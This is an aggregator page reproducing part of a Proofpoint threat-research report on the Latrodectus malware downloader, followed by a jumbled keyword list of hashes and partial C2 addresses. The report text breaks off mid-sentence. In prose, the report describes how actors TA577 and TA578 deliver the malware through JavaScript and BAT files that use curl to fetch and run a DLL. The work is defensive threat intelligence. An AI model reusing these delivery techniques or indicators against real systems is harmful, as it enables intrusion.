One Article Review
| Source |  ProofPoint |
|---|---|
| Identifiant | 8475749 |
| Date de publication | 2024-04-04 11:47:34 (vue: 2024-04-04 09:07:12) |
| Titre | Latrodectus: ces octets d'araignée comme la glace Latrodectus: This Spider Bytes Like Ice |
| Texte | Proofpoint\'s Threat Research team joined up with the Team Cymru S2 Threat Research team, in a collaborative effort to provide the information security community with a comprehensive view of the threat activity described. Key takeaways Proofpoint first observed new malware named Latrodectus appear in email threat campaigns in late November 2023. While use of Latrodectus decreased in December 2023 through January 2024, Latrodectus use increased in campaigns throughout February and March 2024. It was first observed in Proofpoint data being distributed by threat actor TA577 but has been used by at least one other threat actor, TA578. Latrodectus is an up-and-coming downloader with various sandbox evasion functionality. While similar to IcedID, Proofpoint researchers can confirm it is an entirely new malware, likely created by the IcedID developers. Latrodectus shares infrastructure overlap with historic IcedID operations. While investigating Latrodectus, researchers identified new, unique patterns in campaign IDs designating threat actor use in previous IcedID campaigns. Overview Proofpoint identified a new loader called Latrodectus in November 2023. Researchers have identified nearly a dozen campaigns delivering Latrodectus, beginning in February 2024. The malware is used by actors assessed to be initial access brokers (IABs). Latrodectus is a downloader with the objective of downloading payloads and executing arbitrary commands. While initial analysis suggested Latrodectus was a new variant of IcedID, subsequent analysis confirmed it was a new malware most likely named Latrodectus, based on a string identified in the code. Based on characteristics in the disassembled sample and functionality of the malware, researchers assess the malware was likely written by the same developers as IcedID. This malware was first observed being distributed by TA577, an IAB known as a prolific Qbot distributor prior to the malware\'s disruption in 2023. TA577 used Latrodectus in at least three campaigns in November 2023 before reverting to Pikabot. Since mid-January 2024, researchers observed it being used almost exclusively by TA578 in email threat campaigns. Campaign details TA577 TA577 was only observed using Latrodectus in three campaigns, all occurring in November 2023. Notably, a campaign that occurred on 24 November 2023 deviated from previously observed TA577 campaigns. The actor did not use thread hijacking, but instead used contained a variety of different subjects with URLs in the email body. The URLs led to the download of a JavaScript file. If executed, the JavaScript created and ran several BAT files that leveraged curl to execute a DLL and ran it with the export “scab”. Figure 1: Example TA577 campaign delivering Latrodectus. On 28 November 2023, Proofpoint observed the last TA577 Latrodectus campaign. The campaign began with thread hijacked messages that contained URLs leading to either zipped JavaScript files or zipped ISO files. The zipped JavaScript file used curl to download and execute Latrodectus. The zipped ISO file contained a LNK file used to execute the embedded DLL, Latrodectus. Both attack chains started the malware with the export “nail”. TA578 Since mid-January 2024, Latrodectus has been almost exclusively distributed by TA578. This actor typically uses contact forms to initiate a conversation with a target. In one campaign observed on 15 December 2023, Proofpoint observed TA578 deliver the Latrodectus downloader via a DanaBot infection. This December campaign was the first observed use of TA578 distributing Latrodectus. On 20 February 2024, Proofpoint researchers observed TA578 impersonating various companies to send legal threats about alleged copyright infringement. The actor filled out a contact form on multiple targets\' websites, with text containing unique URLs and included in the URI both the domain of the site that initiated the contact form (the target), and the name of the impersonated company (to further the legitimacy |
| Envoyé | Oui |
| Condensat | 090f2c5abb85a7b115dc25ae070153e4e958ae4e1bc2310226c05cd3e9429446 0ac5030e2171914f43e0769cb10b602683ccc9da09369bcd4b80da6edb8be80e 0e96cf6166b7cc279f99d6977ab0f45e9f47e827b8a24d6665ac4c29e18b5ce0 100 1023147713 1057461280 10: 10c129e2310342a55df5fa88331f338452835790a379d5230ee8de7d5f28ea1a 1180344712 119 11: 12: 12 13: 13 140 14: 14 1501064257 1573268852 15: 15 164 166 16: 171/share/cisa 17: 17 187:443 18: 18 190 193 199:80/share/gsm 19: 19 200:443 2017 2021 2022 2023 2023 2024 2024 2048735 2049231 2049232 2049233 2049700 2049701 2049702 2049703 2049704 2049705 2049706 2051598 2051599 2051600 2051601 2051602 2056920153 207/share/escape 207@80/share/escape 20: 20 2143020712 217 21: 2262657793 252 2585978814 2646410796 2941939166 2ad2ad16d2ad2ad22c2ad2ad2ad2ad89cd2abd9b188d3b42762a4c6aa7ff72 30/grms/0 3036889562 310022019 3393436303 3415411565 3524611504 3681413287 37/cqtdio/0 378d220bc863a527c2bca204daba36f10358e058df49ef088f8b1045604d9d05 3919082043 3: 3b63ea8b6f9b2aa847faa11f6cd3eb281abd9b9cceedb570713c4d78a47de567 403 404 4049493703 43650426987684443 4416b8c36cb9d7cc261ff6612e105463eb2ccd4681930ca8e277a6387cb98794 443 47d66c576393a4256d94f5ed1e77adc28426dea027f7a23e2dbf41b93b87bd78 4: 509 5d881d14d2336273e531b1b3d6f2d907539fe8489cbe80533280c9c72efa2273 60c4b6c230a40c80381ce283f64603cac08d3a69ceea91e257c17282f66ceddc 6395541546258323 686741504 6904d382bc045eb9a4899a403a8ba8a417d9ccb764f6e0b462bc0232d3b7e7ea 71fb25cc4c05ce9dd94614ed781d85a50dccf69042521abc6782d48df85e6de9 77270e13d01b2318a3f27a9a477b8386f1a0ebc6d44a2c7e185cfbe55aac8017 7797109211833805 781c63cf4981fa6aff002188307b278fac9785ca66f0b6dfcf68adbe7512e491 8080 856dfa74e0f3b5b7d6f79491a94560dbf3eacacc4a8d8a3238696fa38a4883ea 88/o3zlynw/0 88573297f17589963706d9da6ced7893eacbdc7d6bc43780e4c509b88ccd2aef 904247735 921805286 97e08d1c7970c1c12284c4644e2321ce41e40cdaac941e451db4d334cb9c5492 97e093f2e0bf6dec8392618722dd6b4411088fe752bedece910d11fffe0288a2 998075300 9a8847168fa869331faf08db71690f24e567c5cdf1f01cc5e2a8d08c93d282c9 9b5ee969ca96ba0d4547a6041c5a86bf80fd4c96 9c27405cf926d36ed8e247c17e6743ac00912789efe0c530914d7495de1e21ec DLL LNK November Payload Sha256 a189963ff252f547fddfc394c81f6e9d49eac403c32154eebe06f4cddb5a2a22 aa29a8af8d615b1dd9f52fd49d42563fbeafa35ff0ab1b4afc4cb2b2fa54a119 able about above access accurate across active activities activity actor actors acts addition additional address aee22a35cbdac3f16c3ed742c0b1bfe9739a13469cf43b36fb2c63565111028c affiliated affiliates after aid algorithm aligns alive all alleged allowed almost alone alphabet already also alternative although always amazon analysis analysis analyst analyzed anomalies another anticipates any api apis appdata appear appearance appeared appears appended applicable application applied appropriate aproximately arbitrary arch are area/chief/index around ascari ascii assert assess assessed assigned assist associated association assume atilda attack attacks attempt attempts attribute attributed attribution august austin authors automatically automobile autorun average aytobusesre backend banking banner bar bars base64 based bat bazarloader bb525dc6b7a7ebefd040e01fd48d7d4e178f8d9e5dec9033078ced4e9aa4e241 because become becomes been before began beginning behind being belonging below below: best/live/ between beyond bin bin” bit bit blnwx blocklisted blog body bot bot: both botnet bot brands broadly brokers brute buick bulk bumblebee bundled but button bypass byte bytes c2s c2s c2 calculated called campaign campaigns can capabilities caprese cars case cases certain certificate chains change changes characteristics chart check checking checks chery chevrolet choices classified cleartext clearurl clicking cloudflare cluster cmd cmd code coin coincided collaborative collected com com/elearning/f/q/daas com/ga/index com/ga/m/6 com/live/ com/live com/share/upd combined coming command commands command common commonly communicati |
| Tags | Ransomware Malware Tool Threat Prediction |
| Stories | |
| Notes | ★★★ |
| Move | 
|
L'article ne semble pas avoir été repris aprés sa publication.
L'article ne semble pas avoir été repris sur un précédent.